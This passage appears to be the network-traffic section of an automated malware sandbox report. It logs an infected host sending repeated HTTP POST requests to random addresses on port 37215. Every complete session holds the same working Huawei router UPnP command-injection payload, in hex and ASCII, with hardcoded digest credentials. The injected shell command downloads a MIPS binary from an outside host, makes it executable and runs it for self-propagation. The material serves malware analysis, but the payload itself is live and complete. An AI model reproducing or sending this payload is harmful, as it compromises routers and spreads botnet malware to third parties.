6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.1350402157.79.152.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653002024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.1344198157.193.47.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653003931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.1359494197.43.88.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653031111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.1353116197.105.242.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653031111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.133343041.122.254.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653031111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.1350368157.130.127.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653078079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.1347626197.169.15.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653100967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.133936641.184.85.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653103113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.1340168157.61.98.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653105974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.1339388157.205.108.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653126001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.1359784177.194.251.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653172970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
